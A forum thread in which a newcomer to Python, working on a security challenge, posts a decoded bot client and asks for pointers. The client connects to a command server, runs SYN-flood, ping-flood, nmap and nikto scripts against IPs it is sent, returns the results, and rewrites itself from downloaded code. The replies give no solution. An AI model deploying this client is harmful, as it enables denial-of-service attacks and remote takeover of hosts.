Thread: Cyber challenge

    #1
  1. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Dec 2013
    Posts
    3
    Rep Power
    0

    Cyber challenge


    Hi,
    I'm completly new to python (but have some experience with other programming language)...

    I'm in the middle of a cyber challenge, and have decoded a script which might have a vulnerability...

    Can someone help me out in the right direction? I'm totally lost


    Code:
    from twisted.internet import reactor
    from twisted.internet.protocol import ReconnectingClientFactory
    from twisted.protocols.basic import LineReceiver
    import os
    import re
    import random
    import sys
    import subprocess
    from base64 import b64encode, b64decode
    
    class FirstNetClientProtocol(LineReceiver):
        delimiter = "\n"
    
        def __init__(self):
            self.version = 1.101
            self.state = "INIT"
            self.commands = {
                "DOWNLOAD": {
                    "request_args": 1,
                    "request_handler": None,
                    "response_args": 2,
                    "response_handler": self.handleDownloadResponse, 
                },
                "NIKTO": {
                    "request_args": 2,
                    "request_handler": self.handleAttackRequest,
                    "response_args": 2,
                    "response_handler": None
                },
                "NMAP": {
                    "request_args": 2,
                    "request_handler": self.handleAttackRequest,
                    "response_args": 2,
                    "response_handler": None
                },
                "PING": {
                    "request_args": 1,
                    "request_handler": self.handlePingRequest,
                    "response_args": 1,
                    "response_handler": None
                },
                "PINGFLOOD": {
                    "request_args": 3,
                    "request_handler": self.handleAttackRequest,
                    "response_args": 2,
                    "response_handler": None
                },
                "SYNFLOOD": {
                    "request_args": 3,
                    "request_handler": self.handleAttackRequest,
                    "response_args": 2,
                    "response_handler": None
                },
                "VERSION": {
                    "request_args": 0, 
                    "request_handler": None,
                    "response_args": 1,
                    "response_handler": self.handleVersionResponse,
                },
            } 
            pass
    
        def lineReceived(self, line):
            print line
            words = line.split()
    
            if self.state == "INIT" and line == "FirstNet":
                print line
                self.sendLine("VERSION?")
                self.state = "COMMAND"
                return
    
            if len(words) <= 0:
                print ("Unknown command")
                return
    
            matches = re.search(r"^(.+)([?!])$", words[0])
            if not matches:
                print ("Unknown command")
                return
    
            command = matches.group(1)
            if matches.group(2) == '?':
                command_type = 'REQUEST'
            else:
                command_type = 'RESPONSE'
                     
            if not self.commands.has_key(command):
                print ("Unknown command")
                return
    
            if command_type == 'REQUEST':
                request_args = self.commands[command]['request_args']
                request_handler = self.commands[command]['request_handler']
                if len(words) - 1 != request_args: 
                    print ("Unknown command")
                    return
    
                if request_handler:
                    request_handler(command, *words[1:])
            else:
                response_args = self.commands[command]['response_args']
                response_handler = self.commands[command]['response_handler']
                if len(words) - 1 != response_args: 
                    print ("Unknown command")
                    return
    
                if response_handler:
                    response_handler(command, *words[1:])
    
            print command, command_type
    
        def attack(self, ident, command, arg1, arg2, attack):
            result = subprocess.check_output([command, arg1, str(arg2)])
            self.sendLine("{0}! {1} {2}".format(attack, ident, b64encode(result)))
    
        def handleAttackRequest(self, command, ident, ip, duration=0):
            if not re.match("^[0-9]+$", ident) or not re.match("^[0-9.]+$", ip) or \
                (duration and not re.match("^[0-9]+$", duration)):
                print ("Unknown command")
                return
    
            if command == "NIKTO":
                reactor.callInThread(self.attack, ident, "./nikto.sh", ip, 0, command)
            elif command == "NMAP":
                reactor.callInThread(self.attack, ident, "./nmap.sh", ip, 0, command)
            elif command == "SYNFLOOD":
                reactor.callInThread(self.attack, ident, "./synflood.sh", ip, duration, command)
            elif command == "PINGFLOOD":
                reactor.callInThread(self.attack, ident, "./pingflood.sh", ip, duration, command)
            else:
                print ("Unknown command")
                return
    
        def handleDownloadResponse(self, command, version, data):
            f = open("client.py", "w")
            f.write(b64decode(data))
            f.close()
            reactor.stop()
    
        def handlePingRequest(self, command, ident):
            self.sendLine("PING! {0}".format(ident))
    
        def handleVersionResponse(self, command, version):
            if float(version) > self.version:
                self.sendLine("DOWNLOAD? {0}".format(str(float(version))))
    
    
    class FirstNetClientProtocolFactory(ReconnectingClientFactory):
        def buildProtocol(self, addr):
            return FirstNetClientProtocol()
    
    
    reactor.connectTCP("192.168.123.1", 8123, FirstNetClientProtocolFactory())
    reactor.run()
  2. #2
  3. Contributing User
    Devshed Demi-God (4500 - 4999 posts)

    Join Date
    Aug 2011
    Posts
    4,996
    Rep Power
    481
    Can someone help me out in the right direction?
    Head North by Northwest.
    [code]Code tags[/code] are essential for python code and Makefiles!
  4. #3
  5. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Dec 2013
    Posts
    3
    Rep Power
    0
    Why didn't I think of that LOL


    Originally Posted by b49P23TIvg
    Head North by Northwest.
  6. #4
  7. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Dec 2013
    Posts
    2
    Rep Power
    0
    Where does this direction lead to ? What exactly do you want to do ?
  8. #5
  9. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Dec 2013
    Posts
    3
    Rep Power
    0
    Well, I haven't got much info...
    But I connect to a server on port 8123 (bottom of script)

    I only can input:
    VERSION?
    or
    DOWNLOAD 1.101
    or
    PING?

    I suppose I have to execute one of the .sh scripts, were I possibly can exploit them by adding other code... but now I'm guessing...

    Originally Posted by hyp3rkyd
    Where does this direction lead to ? What exactly do you want to do ?
  10. #6
  11. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Jan 2014
    Posts
    1
    Rep Power
    0
    Originally Posted by mudley
    Well, I haven't got much info...
    But I connect to a server on port 8123 (bottom of script)

    I only can input:
    VERSION?
    or
    DOWNLOAD 1.101
    or
    PING?

    I suppose I have to execute one of the .sh scripts, were I possibly can exploit them by adding other code... but now I'm guessing...
    and did you exceed???
    What did you do??

IMN logo majestic logo threadwatch logo seochat tools logo